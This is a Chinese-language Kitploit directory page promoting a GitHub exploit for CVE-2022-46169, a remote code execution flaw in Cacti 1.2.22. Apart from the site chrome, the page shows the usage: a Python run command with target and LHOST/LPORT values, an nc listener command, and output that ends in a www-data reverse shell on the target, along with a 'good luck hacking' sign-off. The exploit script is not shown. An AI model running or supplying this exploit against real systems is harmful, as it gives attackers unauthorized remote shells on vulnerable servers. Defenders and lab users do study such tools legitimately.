Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2022-46169-CACTI-1.2.22 — 这是针对 cacti 1.2.22 的 CVE-2022-46169 漏洞利用程序。该漏洞利用程序可通过 RCE 在您的计算机上获得一个反向 shell。 | Kitploit
工具/GitHubGitHub/fredbrave/cve-2022-46169-cacti-1.2.22
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试Payload 开发
GitHubfredbrave/cve-2022-46169-cacti-1.2.22

CVE-2022-46169-CACTI-1.2.22

这是针对 cacti 1.2.22 的 CVE-2022-46169 漏洞利用程序。该漏洞利用程序可通过 RCE 在您的计算机上获得一个反向 shell。

查看仓库

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
4282年前Kitploit 审核通过

CVE-2022-46169-CACTI-1.2.22

这是针对 cacti 1.2.22 的 CVE-2022-46169 漏洞利用程序。该漏洞利用程序通过 RCE 在您的计算机上获取一个反向 shell。

依赖

optparse requests

使用方法

先在您计算机的某个端口上进行监听,然后按如下方式运行该漏洞利用程序。

root@kitploit:~
python3 CVE-2022-46169.py  -u http://10.129.216.153 --LHOST=10.10.16.23 --LPORT=443
Checking...
The target is vulnerable. Exploiting...
Bruteforcing the host_id and local_data_ids
Bruteforce Success!!

反向 shell 将出现在监听端口上

root@kitploit:~
nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.16.23] from (UNKNOWN) [10.129.216.153] 36828
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
www-data@50bca5e748b0:/var/www/html$

祝破解好运!!!

下载工具